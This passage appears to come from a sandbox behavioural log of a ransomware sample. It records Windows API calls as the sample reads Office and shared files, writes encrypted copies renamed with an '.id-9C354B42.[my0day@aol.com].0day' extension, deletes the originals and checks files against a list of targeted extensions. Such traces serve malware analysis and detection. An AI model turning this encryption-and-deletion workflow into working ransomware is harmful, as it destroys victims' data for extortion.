(hObject=0x318) returned 1 [0274.865] SetFilePointerEx (in: hFile=0x3a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e6fec8 | out: lpNewFilePointer=0x0) returned 1 [0274.865] SetEndOfFile (hFile=0x3a8) returned 1 [0274.868] CloseHandle (hObject=0x3a8) returned 1 [0274.868] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01434_.WMF.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0274.868] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01434_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01434_.wmf")) returned 1 [0274.868] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01434_.WMF") returned 63 [0274.868] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01434_.WMF") returned 63 [0274.868] lstrlenW (lpString=".doc") returned 4 [0274.868] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0274.868] lstrlenW (lpString=".docx") returned 5 [0274.868] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0274.868] lstrlenW (lpString=".pdf") returned 4 [0274.868] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0274.868] lstrlenW (lpString=".xls") returned 4 [0274.868] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0274.868] lstrlenW (lpString=".xlsx") returned 5 [0274.868] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0274.868] lstrlenW (lpString=".ppt") returned 4 [0274.868] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0274.868] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01434_.WMF") returned 63 [0274.869] lstrlenW (lpString=".zip") returned 4 [0274.869] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0274.869] lstrlenW (lpString=".rar") returned 4 [0274.869] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0274.869] lstrlenW (lpString=".bz2") returned 4 [0274.869] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0274.869] lstrlenW (lpString=".7z") returned 3 [0274.869] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0274.869] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01434_.WMF") returned 63 [0274.869] lstrlenW (lpString=".dbf") returned 4 [0274.869] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0274.869] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01434_.WMF") returned 63 [0274.869] lstrlenW (lpString=".1cd") returned 4 [0274.869] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0274.869] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01434_.WMF") returned 63 [0274.869] lstrlenW (lpString=".jpg") returned 4 [0274.869] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0274.869] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01434_.WMF") returned 63 [0274.869] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01434_.WMF") returned 63 [0274.869] lstrlenW (lpString=".doc") returned 4 [0274.869] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0274.869] lstrlenW (lpString=".docx") returned 5 [0274.869] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0274.869] lstrlenW (lpString=".pdf") returned 4 [0274.869] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0274.869] lstrlenW (lpString=".xls") returned 4 [0274.869] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0274.869] lstrlenW (lpString=".xlsx") returned 5 [0274.869] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0274.869] lstrlenW (lpString=".ppt") returned 4 [0274.869] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0274.869] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01434_.WMF") returned 63 [0274.869] lstrlenW (lpString=".zip") returned 4 [0274.869] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0274.869] lstrlenW (lpString=".rar") returned 4 [0274.870] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0274.870] lstrlenW (lpString=".bz2") returned 4 [0274.870] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0274.870] lstrlenW (lpString=".7z") returned 3 [0274.870] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0274.870] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01434_.WMF") returned 63 [0274.870] lstrlenW (lpString=".dbf") returned 4 [0274.870] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0274.870] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01434_.WMF") returned 63 [0274.870] lstrlenW (lpString=".1cd") returned 4 [0274.870] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0274.870] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01434_.WMF") returned 63 [0274.870] lstrlenW (lpString=".jpg") returned 4 [0274.870] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0274.870] lstrcmpiW (lpString1=".WMF", lpString2=".0day") returned 1 [0274.870] lstrlenW (lpString="DD01628_.WMF") returned 12 [0274.870] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01628_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01628_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a8 [0274.870] GetFileSizeEx (in: hFile=0x3a8, lpFileSize=0x2e6ff1c | out: lpFileSize=0x2e6ff1c*=19068) returned 1 [0274.870] CloseHandle (hObject=0x3a8) returned 1 [0274.870] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01628_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01628_.wmf")) returned 0x20 [0274.870] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01628_.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01628_.wmf.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0274.871] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01628_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01628_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a8 [0274.871] SetFilePointerEx (in: hFile=0x3a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e6fec8 | out: lpNewFilePointer=0x0) returned 1 [0274.871] SetFilePointerEx (in: hFile=0x3a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e6fec8 | out: lpNewFilePointer=0x0) returned 1 [0274.871] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01628_.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01628_.wmf.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x318 [0274.872] GetLastError () returned 0x0 [0274.872] ReadFile (in: hFile=0x3a8, lpBuffer=0x35c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e6fed4, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesRead=0x2e6fed4*=0x4a7c, lpOverlapped=0x0) returned 1 [0274.906] WriteFile (in: hFile=0x318, lpBuffer=0x35c0020*, nNumberOfBytesToWrite=0x4a80, lpNumberOfBytesWritten=0x2e6fc9c, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesWritten=0x2e6fc9c*=0x4a80, lpOverlapped=0x0) returned 1 [0274.907] ReadFile (in: hFile=0x3a8, lpBuffer=0x35c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e6fed4, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesRead=0x2e6fed4*=0x0, lpOverlapped=0x0) returned 1 [0274.907] WriteFile (in: hFile=0x318, lpBuffer=0x35c0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2e6fc9c, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesWritten=0x2e6fc9c*=0xec, lpOverlapped=0x0) returned 1 [0274.907] SetEndOfFile (hFile=0x318) returned 1 [0274.907] CloseHandle (hObject=0x318) returned 1 [0274.907] SetFilePointerEx (in: hFile=0x3a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e6fec8 | out: lpNewFilePointer=0x0) returned 1 [0274.907] SetEndOfFile (hFile=0x3a8) returned 1 [0274.910] CloseHandle (hObject=0x3a8) returned 1 [0274.910] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01628_.WMF.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0274.958] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01628_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01628_.wmf")) returned 1 [0275.012] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01628_.WMF") returned 63 [0275.012] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01628_.WMF") returned 63 [0275.012] lstrlenW (lpString=".doc") returned 4 [0275.012] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0275.012] lstrlenW (lpString=".docx") returned 5 [0275.012] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0275.012] lstrlenW (lpString=".pdf") returned 4 [0275.012] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0275.012] lstrlenW (lpString=".xls") returned 4 [0275.012] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0275.012] lstrlenW (lpString=".xlsx") returned 5 [0275.012] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0275.012] lstrlenW (lpString=".ppt") returned 4 [0275.012] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0275.013] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01628_.WMF") returned 63 [0275.013] lstrlenW (lpString=".zip") returned 4 [0275.013] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0275.013] lstrlenW (lpString=".rar") returned 4 [0275.013] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0275.013] lstrlenW (lpString=".bz2") returned 4 [0275.013] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0275.013] lstrlenW (lpString=".7z") returned 3 [0275.013] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0275.013] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01628_.WMF") returned 63 [0275.013] lstrlenW (lpString=".dbf") returned 4 [0275.013] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0275.013] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01628_.WMF") returned 63 [0275.013] lstrlenW (lpString=".1cd") returned 4 [0275.013] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0275.013] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01628_.WMF") returned 63 [0275.013] lstrlenW (lpString=".jpg") returned 4 [0275.013] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0275.013] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01628_.WMF") returned 63 [0275.013] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01628_.WMF") returned 63 [0275.013] lstrlenW (lpString=".doc") returned 4 [0275.013] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0275.013] lstrlenW (lpString=".docx") returned 5 [0275.013] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0275.013] lstrlenW (lpString=".pdf") returned 4 [0275.013] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0275.013] lstrlenW (lpString=".xls") returned 4 [0275.013] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0275.013] lstrlenW (lpString=".xlsx") returned 5 [0275.013] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0275.013] lstrlenW (lpString=".ppt") returned 4 [0275.013] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0275.013] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01628_.WMF") returned 63 [0275.013] lstrlenW (lpString=".zip") returned 4 [0275.014] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0275.014] lstrlenW (lpString=".rar") returned 4 [0275.014] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0275.014] lstrlenW (lpString=".bz2") returned 4 [0275.014] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0275.014] lstrlenW (lpString=".7z") returned 3 [0275.014] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0275.014] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01628_.WMF") returned 63 [0275.014] lstrlenW (lpString=".dbf") returned 4 [0275.014] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0275.014] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01628_.WMF") returned 63 [0275.014] lstrlenW (lpString=".1cd") returned 4 [0275.014] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0275.014] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01628_.WMF") returned 63 [0275.014] lstrlenW (lpString=".jpg") returned 4 [0275.014] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0275.014] lstrcmpiW (lpString1=".WMF", lpString2=".0day") returned 1 [0275.014] lstrlenW (lpString="DD01772_.WMF") returned 12 [0275.014] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01772_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01772_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) Thread: id = 60 os_tid = 0x690 [0265.263] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x10000) returned 0x34d0050 [0265.263] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x10000) returned 0x34e0058 [0265.263] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x10) returned 0x533500 [0265.263] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x6) returned 0x521b60 [0265.263] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x10) returned 0x533518 [0265.263] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x100000) returned 0x3810020 [0265.263] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x10) returned 0x533530 [0265.263] RtlReAllocateHeap (Heap=0x4a0000, Flags=0x0, Ptr=0x533530, Size=0x20) returned 0x587a58 [0265.263] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x10) returned 0x533530 [0265.263] RtlReAllocateHeap (Heap=0x4a0000, Flags=0x0, Ptr=0x533530, Size=0x20) returned 0x587a30 [0265.264] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x74da0000 [0265.264] GetProcAddress (hModule=0x74da0000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x74dcd650 [0265.264] Wow64DisableWow64FsRedirection (in: OldValue=0x2faff58 | out: OldValue=0x2faff58*=0x0) returned 1 [0265.264] lstrlenW (lpString="kernel32.dll") returned 12 [0265.264] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x587a58 | out: hHeap=0x4a0000) returned 1 [0265.264] lstrlenA (lpString="Wow64DisableWow64FsRedirection") returned 30 [0265.264] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x587a30 | out: hHeap=0x4a0000) returned 1 [0265.264] Sleep (dwMilliseconds=0x64) [0265.410] Sleep (dwMilliseconds=0x64) [0265.565] Sleep (dwMilliseconds=0x64) [0265.780] lstrcmpiW (lpString1=".xml", lpString2=".0day") returned 1 [0265.780] lstrlenW (lpString="Content.xml") returned 11 [0265.780] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Content.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\content.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x304 [0265.851] GetFileSizeEx (in: hFile=0x304, lpFileSize=0x2faff1c | out: lpFileSize=0x2faff1c*=27045) returned 1 [0265.851] CloseHandle (hObject=0x304) returned 1 [0265.851] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Content.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\content.xml")) returned 0x20 [0265.851] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Content.xml.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\content.xml.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0265.851] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Content.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\content.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0265.851] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Content.xml") returned 62 [0265.851] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Content.xml") returned 62 [0265.851] lstrlenW (lpString=".doc") returned 4 [0265.851] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0265.851] lstrlenW (lpString=".docx") returned 5 [0265.851] lstrcmpiW (lpString1=".docx", lpString2="t.xml") returned -1 [0265.851] lstrlenW (lpString=".pdf") returned 4 [0265.851] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0265.851] lstrlenW (lpString=".xls") returned 4 [0265.852] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0265.852] lstrlenW (lpString=".xlsx") returned 5 [0265.852] lstrcmpiW (lpString1=".xlsx", lpString2="t.xml") returned -1 [0265.852] lstrlenW (lpString=".ppt") returned 4 [0265.852] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0265.852] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Content.xml") returned 62 [0265.852] lstrlenW (lpString=".zip") returned 4 [0265.852] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0265.852] lstrlenW (lpString=".rar") returned 4 [0265.852] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0265.852] lstrlenW (lpString=".bz2") returned 4 [0265.852] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0265.852] lstrlenW (lpString=".7z") returned 3 [0265.852] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0265.852] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Content.xml") returned 62 [0265.852] lstrlenW (lpString=".dbf") returned 4 [0265.852] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0265.852] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Content.xml") returned 62 [0265.852] lstrlenW (lpString=".1cd") returned 4 [0265.852] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0265.852] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Content.xml") returned 62 [0265.852] lstrlenW (lpString=".jpg") returned 4 [0265.852] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0265.852] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Content.xml") returned 62 [0265.852] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Content.xml") returned 62 [0265.852] lstrlenW (lpString=".doc") returned 4 [0265.852] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0265.852] lstrlenW (lpString=".docx") returned 5 [0265.852] lstrcmpiW (lpString1=".docx", lpString2="t.xml") returned -1 [0265.852] lstrlenW (lpString=".pdf") returned 4 [0265.852] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0265.852] lstrlenW (lpString=".xls") returned 4 [0265.852] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0265.852] lstrlenW (lpString=".xlsx") returned 5 [0265.852] lstrcmpiW (lpString1=".xlsx", lpString2="t.xml") returned -1 [0265.852] lstrlenW (lpString=".ppt") returned 4 [0265.853] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0265.853] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Content.xml") returned 62 [0265.853] lstrlenW (lpString=".zip") returned 4 [0265.853] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0265.853] lstrlenW (lpString=".rar") returned 4 [0265.853] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0265.853] lstrlenW (lpString=".bz2") returned 4 [0265.853] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0265.853] lstrlenW (lpString=".7z") returned 3 [0265.853] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0265.853] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Content.xml") returned 62 [0265.853] lstrlenW (lpString=".dbf") returned 4 [0265.853] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0265.853] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Content.xml") returned 62 [0265.853] lstrlenW (lpString=".1cd") returned 4 [0265.853] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0265.853] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Content.xml") returned 62 [0265.853] lstrlenW (lpString=".jpg") returned 4 [0265.853] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0265.853] lstrcmpiW (lpString1=".avi", lpString2=".0day") returned 1 [0265.853] lstrlenW (lpString="boxed-join.avi") returned 14 [0265.853] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-join.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-join.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x308 [0266.477] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x2faff1c | out: lpFileSize=0x2faff1c*=33280) returned 1 [0266.477] CloseHandle (hObject=0x308) returned 1 [0266.477] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-join.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-join.avi")) returned 0x20 [0266.478] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-join.avi.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-join.avi.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0266.478] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-join.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-join.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0266.478] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-join.avi") returned 71 [0266.478] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-join.avi") returned 71 [0266.478] lstrlenW (lpString=".doc") returned 4 [0266.478] lstrcmpiW (lpString1=".doc", lpString2=".avi") returned 1 [0266.478] lstrlenW (lpString=".docx") returned 5 [0266.478] lstrcmpiW (lpString1=".docx", lpString2="n.avi") returned -1 [0266.478] lstrlenW (lpString=".pdf") returned 4 [0266.478] lstrcmpiW (lpString1=".pdf", lpString2=".avi") returned 1 [0266.478] lstrlenW (lpString=".xls") returned 4 [0266.478] lstrcmpiW (lpString1=".xls", lpString2=".avi") returned 1 [0266.478] lstrlenW (lpString=".xlsx") returned 5 [0266.478] lstrcmpiW (lpString1=".xlsx", lpString2="n.avi") returned -1 [0266.478] lstrlenW (lpString=".ppt") returned 4 [0266.478] lstrcmpiW (lpString1=".ppt", lpString2=".avi") returned 1 [0266.478] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-join.avi") returned 71 [0266.478] lstrlenW (lpString=".zip") returned 4 [0266.478] lstrcmpiW (lpString1=".zip", lpString2=".avi") returned 1 [0266.478] lstrlenW (lpString=".rar") returned 4 [0266.478] lstrcmpiW (lpString1=".rar", lpString2=".avi") returned 1 [0266.478] lstrlenW (lpString=".bz2") returned 4 [0266.478] lstrcmpiW (lpString1=".bz2", lpString2=".avi") returned 1 [0266.478] lstrlenW (lpString=".7z") returned 3 [0266.478] lstrcmpiW (lpString1=".7z", lpString2="avi") returned -1 [0266.478] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-join.avi") returned 71 [0266.478] lstrlenW (lpString=".dbf") returned 4 [0266.478] lstrcmpiW (lpString1=".dbf", lpString2=".avi") returned 1 [0266.478] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-join.avi") returned 71 [0266.478] lstrlenW (lpString=".1cd") returned 4 [0266.478] lstrcmpiW (lpString1=".1cd", lpString2=".avi") returned -1 [0266.478] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-join.avi") returned 71 [0266.479] lstrlenW (lpString=".jpg") returned 4 [0266.479] lstrcmpiW (lpString1=".jpg", lpString2=".avi") returned 1 [0266.479] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-join.avi") returned 71 [0266.479] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-join.avi") returned 71 [0266.479] lstrlenW (lpString=".doc") returned 4 [0266.479] lstrcmpiW (lpString1=".doc", lpString2=".avi") returned 1 [0266.479] lstrlenW (lpString=".docx") returned 5 [0266.479] lstrcmpiW (lpString1=".docx", lpString2="n.avi") returned -1 [0266.479] lstrlenW (lpString=".pdf") returned 4 [0266.479] lstrcmpiW (lpString1=".pdf", lpString2=".avi") returned 1 [0266.479] lstrlenW (lpString=".xls") returned 4 [0266.479] lstrcmpiW (lpString1=".xls", lpString2=".avi") returned 1 [0266.479] lstrlenW (lpString=".xlsx") returned 5 [0266.479] lstrcmpiW (lpString1=".xlsx", lpString2="n.avi") returned -1 [0266.479] lstrlenW (lpString=".ppt") returned 4 [0266.479] lstrcmpiW (lpString1=".ppt", lpString2=".avi") returned 1 [0266.479] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-join.avi") returned 71 [0266.479] lstrlenW (lpString=".zip") returned 4 [0266.479] lstrcmpiW (lpString1=".zip", lpString2=".avi") returned 1 [0266.479] lstrlenW (lpString=".rar") returned 4 